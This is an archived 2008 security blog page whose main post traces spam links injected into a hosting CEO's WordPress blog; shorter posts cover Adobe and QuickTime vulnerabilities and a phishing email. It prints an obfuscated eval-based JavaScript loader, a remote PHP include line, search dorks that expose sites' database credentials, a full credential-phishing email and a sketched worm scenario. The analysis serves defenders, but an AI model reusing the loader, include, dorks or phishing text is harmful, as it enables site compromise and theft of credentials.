Kakkoi » Exploit

Adobe Acrobat, Acrobat 3D & Reader Multiple Vulnerabilities

Noah Ark — Sat, 09 Feb 2008 14:35:38 +0000

A JavaScript Buffer Overflow in Adobe Acrobat, Acrobat 3D & Reader allowed remote attacker to execute arbitrary code. The code will run with the privileges of the target user opening the PDF document.

Excerpt from iDefense Public Advisory;

Adobe Reader and Acrobat implement a version of JavaScript in the EScript.api plug-in which is based on the reference implementation used in Mozilla products. One of the methods exposed allows direct control over low level features of the object, which in turn allows execution of arbitrary code.

Workaround

Disabled Adobe Reader & Acrobat JavaScript. Perform Update ↓

Update -Adobe Acrobat & Reader version 8.1.2

Adobe released version 8.1.2 of Adobe Reader, Acrobat & Acrobat 3D to address
these vulnerabilities.

These vulnerabilities were discovered by Greg MacManus of VeriSign iDefense Labs.

How to safely remove AcroRd32Info.exe (Adobe Reader)

External Links

Security update available for Adobe Reader and Acrobat 8 (APSA08-01)

Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II

chaoskaizer.myopenid.com — Thu, 31 Jan 2008 17:07:22 +0000

Being Hacked by SEO spammer is seem like a yearly events at Mattheaton.com. Matt’s WordPress blog was first hijacked 2 months ago on 26 November 2007 (according to my record). You can digg my earlier post at → Matt Heaton BlueHost HostMonster CEO Official Blog Hacked.

It’s a big embarrassment for bluehost & hostmonster hosting to have their CEO’s blog being spamride every year (since 2007) . Drilling Matt Heaton’s with bad ads wont solves the Blackhat Spam issues, I will left that particulars part to my readers to speculate.

Mattheaton Goro Spam Chronology

Date	Event
Jul 2007	Google PR 7
Aug 2007	Stop being Index by archive.org
Nov 28th 2007	Wordpress.net.in Goro Spam on wp_footer backlink to howardowens.com
Dec 4th 2007	Unknown Goro Spam on wp_head backlink to tangonoticias.com
Dec 11th 2007	Wordpress Upgrade to version 2.3.1
Jan 16th, 2008	Google PR5
Jan 26th, 2008	Unknown Blackhat SEO spam on wp_head backlink to brainwave-india.com
Feb 3rd, 2008	Unknown Blackhat SEO spam on wp_head backlink to thinkingphp.org
Feb 8th, 2008	Unknown uusing CSS cloacking method on wp_head backlink to zoorender.com
Feb 13th, 2008	Unknown using CSS cloacking method on wp_head backlink to blog.jensfranke.com
Feb 20th, 2008	Unknown using CSS cloacking method on wp_head backlink to entrepreneur27.org
Feb 24th, 2008	Unknown using CSS cloacking method on wp_head backlink to latenightpc.com
Feb 26th, 2008	Unknown using CSS cloacking method on wp_head backlink to communitynext.com

Wordpress.net.in GORO Spam Pattern

All the infected sites will stop being index by archive.org few months before the spam started.
From Nov 2007 to Jan 2008 (Right after Google Mass P3 De-rank fever) - The Blackhat Goro Spammer is targeting PR6 & PR7 sites running on WordPress (2.3.1 below) and on some rare case (tangonoticias.com) Joomla CMS (1.0.x)
I categorize this blackhat method as Sybil Attack

A Sybil attack is one in which an attacker subverts the reputation system by creating a large number of pseudonymous entities, and using them to gain a disproportionately large influence. A reputation system’s vulnerability to a Sybil attack depends on how cheaply Sybils can be generated, the degree to which the reputation system accepts input from entities that do not have a chain of trust linking them to a trusted entity, and whether the reputation system treats all entities identically.

- Derank and manipulate their victim host to boost their pharmaceutical products on Google Local Search Index (gaming Localrank for better SERP)

Goro signatures:

html div with id “goro”

Output spam on WordPress wp_footer & wp_head hook

Blackhat SEO Spamdexing Google Local Search Index

The below graph explain the Blackhat SEO Spamdexing methods for Manipulating Google Local SERP.

View Spamdexing Google Local Search Image

Note: A blackhat at hoqwarts ;)

ScreenGrab

mattheaton.com Jan 28 2008 (1009 x 6576 pixels)
brainwave-india.com Jan 28 2008 (1016 x 2306 pixels)
Google Local Search Jan 28 2008 Spamdexing Results
stc-israel.org.il Jan 28 2008 spamdexing page (hidden text)
stc-israel.org.il Jan 28 2008 spamdexing page (text reveal)

Recent Update

Feb 1, 2008 - we send a letter to matt@bluehost.com regarding this issue. Still waiting for his replies

Feb 3, 2008 - The Blackhat Goro Spammer change their target spamhost from http://www.brainwave-india.com (PR6) to http://www.thinkingphp.org (PR6) - Felix Geisendörfer.

function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (++idx; idx < len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306');

thinkingphp.org blog is running on WordPress 2.3.2. We send him email regarding the Goro Spam hijack.

Feb 8th 2008, There is no signature of Goro spam (tag with id goro) on Matt’s blog the blackhat is now using Inline CSS Position Overflow to hide the spams links ↓ redirect to zoorender.com (PR6).
```
buying .. 
```

Feb 13th 2008, Same methods as above (inline css cloacking) .
- HTML Code shown to a Regular Browser → 32,246 characters
- HTML Code shown to Google Bot → 34,646 characters
redirect to blog.jensfranke.com (PR7).
```
buy generic fi
```

Feb 20th 2008, CSS Cloacking redirect to http://www.entrepreneur27.org/ (PR6).
```
bad side effects of viagra  ...
```
Feb 24th 2008, CSS Cloacking redirect to http://www.latenightpc.com (PR5). mattheaton-com-022408-source.txt
Feb 26th 2008, CSS Cloacking redirect to http://www.communitynext.com/ WordPress 2.3.3 (PR6). mattheaton-com-022608-source.txt

External Links

Email Phishing and Spams Trends - Be wary

Avice De'veréux — Tue, 11 Dec 2007 14:09:28 +0000

Below is typical phishing email I received on Dec 8, 2007. It was send to one of my active gmail accounts.

The Email Header

From: “Gmail Team”
Subject: Gmail Warning!!!! Verify Your Gmail Account To Avoid Close.
Part of the message ↓: Dear member,

This message is from gmail message center to all gmail free account owners
and premium account owners. We are currently upgrading our data base and
e-mail account center. We are deleting all unused gmail account to create
more space for new accounts.

*To prevent your account from closing, you will have to verify it below so
that we will know that it’s a present used account.*

* CONFIRM YOUR IDENTITY. VERIFY YOUR FREE GMAIL ACCOUNT NOW !!! [...]

Raw Email Content

This are part of of the raw message on gmail its not download via pop3. Certain meta info is not available as its got filtered by gmail services (spam automatic removal).

Delivered-To random-victims-name@gmail.com
Received: by 10.114.235.19 with SMTP id i19cs230694wah;
 Sat, 8 Dec 2007 04:27:12 -0800 (PST)
Received: by 10.141.20.7 with SMTP id x7mr3231780rvi.1197116792300;
 Sat, 08 Dec 2007 04:26:32 -0800 (PST)
Received: by 10.141.115.15 with HTTP; Sat, 8 Dec 2007 04:26:32 -0800 (PST)
Message-ID: <2f83b9150712080426n4a018c86mc2af4a4ed271f223@mail.gmail.com>
Date: Sat, 8 Dec 2007 13:26:32 +0100
From: "Gmail Team" 
Reply-To: customercareteamalert2@gmail.com
Subject: Gmail Warning!!!! Verify Your Gmail Account To Avoid Close.
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_Part_11145_31274162.1197116792293"

------=_Part_11145_31274162.1197116792293
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

 Dear Member*,* **
 * Account Alert*
***
 *
 *VERIFY YOUR GMAIL ACCOUNT NOW TO AVOID CLOSE !!!*
***GMAI L
*Dear Member*,*
 This message is from gmail message center to all gmail free account owners
and premium account owners. We are currently upgrading our data base and
e-mail account center. We are deleting all unused gmail account to create
more space for new accounts.

 *To prevent your account from closing, you will have to verify it below so
that we will know that it's a present used account.*

* CONFIRM YOUR IDENTITY. VERIFY YOUR FREE GMAIL ACCOUNT NOW !!!

 Gmail! ID:.........................

 Password:........................

 Your Birthday:.................

 Your Country or Territory:...........
 Enter the Security
Characters:......... [image: Registration
Verification Code]
*

 *Warning!!! **Account owner that refuses to update his or her account
before two weeks of receiving this warning will lose his or her account
permanently. *
**
*Sincerely,*
*Gmail Team*

------=_Part_11145_31274162.1197116792293
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Dear Member,

 Account Alert

VERIFY YOUR GMAIL ACCOUNT NOW TO AVOID CLOSE !!!

GMAI
 L
Dear Member,

This message is from gmail message center to all gmail free account owners and premium account owners. We are currently upgrading our data base and e-mail account center. We are deleting all unused gmail account to create more space for new accounts.

To prevent your account from closing, you will have to verify it below so that we will know that it's a present used account.

CONFIRM YOUR IDENTITY. VERIFY YOUR FREE GMAIL ACCOUNT NOW !!! 

       Gmail! ID:.........................

        Password:........................

       Your Birthday:.................

       Your Country or Territory:........... 

       Enter the Security Characters:.........                                

Warning!!!   Account owner that refuses to update his or her account before two weeks of receiving this warning will lose his or her account permanently.

Sincerely,
Gmail Team

------=_Part_11145_31274162.1197116792293--

They used Outlook to published this email and leeched numbers of images across different “known” web services ↓

Image Sources

Gmail Logo: Google Presskit logo

Captcha : yahoo (SSL)

Gmail Logo 2: genbeta.com (might be their host)

Header: EbayStatic Server

Whats the motiff

It may seem funny to read the message as this are pretty much a script kiddies at work. I’m sure that most savvy users will not trust this types of threat. But what most people unaware of is the “Image” portions of the message. It can play a big role for expoiting email.

QuickInfo: Spam “images” trends start around june 2006 and earlier version of popular email client (Outlook and Thunderbird) doesn’t block images by default.

If you are familliar with Internet Security in general,you may notice that there is many attemp and proof of concept method in exploiting Images like “TIFF & JPEG“. Both of this vulnurebilities exists in Internet Explorer Browser and various microsoft windows products. While we can only make educated guesses as there is no real working proof yet.

My doodling scenario produce this ↓

Session “hacker” create a malicious server side image → proxy tunnel send to multiple email server → the curious victim open the email → steal client informations (cookie or server session cookie) → spoof the request → send RST back to client (reset) → dump the victims data in one instance. → write signature on victim email (avoid loop) → propogate using victims session → new net-worm is born

Try digging around VX Heavens & milw0rm Database you’ll find something to start thinkering.

Block Apple Quicktime ActiveX & RTSP Exploit

Nick B — Thu, 06 Dec 2007 17:45:50 +0000

Apple QuickTime contains a stack buffer overflow vulnerability in the way it handles the RTSP Content-Type header. This vulnerability may be exploited by specially crafted RTSP stream protocol

Live Example

Elia Florio (Symantec) wrap a good introduction post regarding QuickTime 0 day Exploit.

Known Vulnerabilities Proof of concept (milw0rm).

Workarounds

You may try the following workarounds, as there is no complete patch for this this vulnerability.

Block TCP port 554 (optionaly 7070) and UDP 6970 through 6999 in your firewall
Update Quicktime
Disabled Apple Quicktime ActiveX control running in Internet Explorer (Windows registry file)
For Firefox - Noscripts addons

Matt Heaton BlueHost HostMonster CEO Official Blog Hacked

Avice De'veréux — Sat, 01 Dec 2007 09:55:53 +0000

Dec 11 2007 - Matt Heaton Blog’s has been cleansed. ATM he’s using latest version of WordPress (2.3.x). And also most of the blogs lists in this articles has been upgrade.

Jan 26th, 2008 - Seem like bluehost engineer did a bad job at cleaning, the goro spam is back.

Just after the recent issue on wordpress.com.cn now there is new wordpress imitater. A remote spamware injection by wordpress.net.in

I was reading one of Matt Heaton posted 2 days ago when I found bunch of spamsware link on his wordpress footer.

Matt’s is using default wodpress theme (kubrick) with single javascript for adsense. The only way the spams can get in is probably via php injection or by manual editing. All the spamware is redirect to howardowens.com/?order=XX page.

Lookup for howardowens.com

The below diagram explained the lookup results for howardowens.com. click on the image to enlarge.

Surprisingly the spammer website is also host by bluehost.com (69.89.16.0/20,74.220.192.0/19 ,69.89.16.4 -> box183.bluehost.com).

Tracking the spam sources.

Viewing mattheaton.com html sources I found some hint and start searching for xanax intext:id=\”goro\”. Google return 2 results for this query.

1. Wordpress Support: php get footer adding spam code?
2. elijahzarwan.net: div id=”Goro” (nice headline)

Both site suggest same type of php injection methods
include('http://wordpress.net.in/statcounter.php');

The statcounter.php is just normal text/plain full with spam links. The spam content on Matt Heaton blog is randomly generate from http://wordpress.net.in/[random]/ random = 1 - 9.

Raw whois for wordpress.net.in

Domain ID:D2500581-AFIN
Domain Name:WORDPRESS.NET.IN
Created On:22-Apr-2007 12:01:55 UTC
Last Updated On:22-Jun-2007 02:26:40 UTC
Expiration Date:22-Apr-2008 12:01:55 UTC
Sponsoring Registrar:Direct Information Pvt. Ltd. dba PublicDomainRegistry.com (R5-AFIN)
Status:OK
Registrant ID:DI_4275224
Registrant Name:Mick Jagger
Registrant Organization:N/A
Registrant Street1:1 Red Square
Registrant City:Moscow
Registrant State/Province:Massachusetts
Registrant Postal Code:123592
Registrant Country:RU
Registrant Phone:+007.7581235641
Registrant Email:mkk.goro@bk.ru
Admin ID:DI_4275224
Admin Name:Mick Jagger
Admin Organization:N/A
Admin Street1:1 Red Square
Admin City:Moscow
Admin State/Province:Massachusetts
Admin Postal Code:123592
Admin Country:RU
Admin Phone:+007.7581235641
Admin Email:mkk.goro@bk.ru
Tech ID:DI_4275224
Tech Name:Mick Jagger
Tech Organization:N/A
Tech Street1:1 Red Square
Tech City:Moscow
Tech State/Province:Massachusetts
Tech Postal Code:123592
Tech Country:RU
Tech Phone:+007.7581235641
Tech Email:mkk.goro@bk.ru
Name Server:MKKG98981.MERCURY.ORDERBOX-DNS.COM
Name Server:MKKG98981.VENUS.ORDERBOX-DNS.COM
Name Server:MKKG98981.EARTH.ORDERBOX-DNS.COM
Name Server:MKKG98981.MARS.ORDERBOX-DNS.COM

Note: The registrant address on 1 red square is a famous restaurant in Moscow.

Its pretty obvious that wordpress.net.in belong to registrar in India.

Live example wordpress.net.in injection

Google query for warning “[function.include]” allintext: “wordpress.net.in” . Used fiddler or any http-inspector to trace the full header request.

1 Evan Morris: Wordpress 2.0.6 | url | screenshot
2 carwax: Wordpress 1.5.2 | url | screenshot
3 aabenthus.biz: Wordpress 2.0.x | url | screenshot
4 mythinger.com: Wordpress 2.0.2 | url | screenshot
5 classicalanglican.net: Wordpress 2.0.2 | url | screenshot
6 echo9er.net: WordPress 1.5.1 | url | screenshot
7 boyarick.com: Wordpress 2.0.2 | url | screenshot

Google Directory search for class-mail.php

Search for class-mail.php in open directory (public).
“parent directory” class-mail.php -html -htm –php -shtml -md5 -md5sums

jean-cyril.com - wp-includes · spams link redirect to www.901am.com/?page=2157. jean-cyril.com has wp-info.txt inside his wp-includes directory. This text files hold unserialize database password and stuff.
floaridablog.org - wp-includes · spams redirect to communications.uml.edu/sunrise/?id=1076 (University of Massachusetts Lowell) the offending spams page has been removed by UML maintainer.

Hiding from search engine Spiders

First, I did some more comparative search at archive.org for howardowens.com and mattheaton.com. It turn out both of this sites has been stop from IA Archiver few months before the spams start showing on their footer. You will need to check howardowens index on archive.org so you can understand my suspicious.

http://web.archive.org/web/*/http://www.howardowens.com
http://web.archive.org/web/*/http://www.mattheaton.com

Out of boredom I cloaked myself as the following agents.

Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) - 74.6.8.125 - llf520032.crawl.yahoo.net
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 66.249.64.50 - crawl-66-249-64-50.googlebot.com
Mozilla/2.0 (compatible; Ask Jeeves/Teoma) - 65.214.44.204 - egspd42002.ask.com
Mediapartners-Google/2.1 66.249.73.213 - crawl-66-249-73-213.googlebot.com

Not much change on both of these sites. Then I read the status header, it return 404 instead of 200. Nice tricks for stopping crawler & spider from spying their joy-ride-spamhouse.

Summary

bits & bytes from this accident we knew that

Most of the site inject are running on wordpress 2.0.6 & below
allow_furl_open is set to true for this injection to work
Most of the blogs owner is unaware about the spams links (cloacking)

Checkout Murray access log, it will give you some ideas with the remote injections methods.

Update

Dec 03 2007: All the spams link to howardowens.com page has been removed. I havent talk with howardowens but I assume howard’s site is being injected the same way like Matt Heaton blog.
Dec 04 2007: Mattheaton.com has a minor update, the spams now inject on both header and footer.
tangonoticias.com:7070/d_pill/577.html.
As tangonoticias.com is running on Joomla CMS they create a static “Wordpress” on port 7070 (Real Network Server & RSTP Port). This is probably a work of different attacker, taking advantage of Matt heaton blindspot. Google Cache (Nov 12)
Dec 11 2007: Matt heaton has been purified. He’s now using latest version of Wordpress (2.3.1). You can still view it on cached thought & screenshot.

How to Removed wordpress.net.in Spam Injection
Jan 31st, 2008 - Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II

How to safely remove AcroRd32Info.exe

Nick B — Thu, 29 Nov 2007 13:05:00 +0000

AcroRd32Info is a another creative pieces of crap from Adobe a package for Acrobat Reader. Embed in Windows Explorer Shell, its main role is to start an initial prefetching for PDF documents in the Memory.

To test this program behavior, you will need to open your windows task manager (ctrl+alt+del once) and browse to any folder that contained a PDF documents and stay idle. Within just few seconds AdobeRd32Info will be loaded in the background and stay in memory.That was just for browsing the folder without opening any PDF files yet.

Windows has a standard prefetch modes and its fairly stable for most of the applications out there. Having a another background prefetcher hook on explorer is plain abusive not to mention its running without the owner permissions.

Adobe Reader is cheating. Its understable that with this methods it will improve the Acrobat boot time log, but I dont see much differences when its running in the background preparing to load a single PDF documents, its a pollutions.

AcroRd32Info stay in your memory so consider it as a pestware.

Here’s how you can safely removed this programs.

The proper way

open Adobe AcroRd32
Edit » Preferences
Select the internet categories in the menu list then disabled
Allow fast web view & Allow speculative downloading in the background

If thats doesnt work, you try this unrecommended method to disabled it.

Browse to Adobe Reader directory usually at “Program Files\Adobe\Reader\”
Find AcroRd32Info.exe
Rename it from AcroRd32Info.exe to Acro_Rd32Info.exe

Recent Exploit on Adobe Reader

Exploit:W32/AdobeReader.K

From FSECURE, Exploit:W32/AdobeReader.K is detection of a malicious PDF file that is being heavily spammed through e-mail and it appears as an attachment.
This malicious PDF file takes advantage of a vulnerability on the URI handling of PDF files. This vulnerability affects IE7, Adobe Acrobat, and Adobe Reader on some platforms.
Users should update their Adobe Reader installations.

Affected Software Versions

Adobe Reader 8.1 and earlier, Adobe Reader 7.0.9 and earlier. Adobe Acrobat Professional, 3D and Standard 8.1 and earlier versions, Adobe Acrobat Professional, Standard, 3D and Elements 7.0.9 and earlier.

More info on this exploits at National Vulnerability Database

Kakkoi » Exploit

Adobe Acrobat, Acrobat 3D & Reader Multiple Vulnerabilities

Workaround

Update -Adobe Acrobat & Reader version 8.1.2

Related Posts

External Links

Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II

Mattheaton Goro Spam Chronology

Wordpress.net.in GORO Spam Pattern

Blackhat SEO Spamdexing Google Local Search Index

View Spamdexing Google Local Search Image

ScreenGrab

Recent Update

Related Posts

External Links

Email Phishing and Spams Trends - Be wary

The Email Header

Raw Email Content

Whats the motiff

Block Apple Quicktime ActiveX & RTSP Exploit

Known Vulnerabilities Proof of concept (milw0rm).

Workarounds

Related Links

Matt Heaton BlueHost HostMonster CEO Official Blog Hacked

Lookup for howardowens.com

Tracking the spam sources.

Raw whois for wordpress.net.in

Live example wordpress.net.in injection

Google Directory search for class-mail.php

Hiding from search engine Spiders

Summary

Update

Related Post

How to safely remove AcroRd32Info.exe

The proper way

Recent Exploit on Adobe Reader

Exploit:W32/AdobeReader.K

Affected Software Versions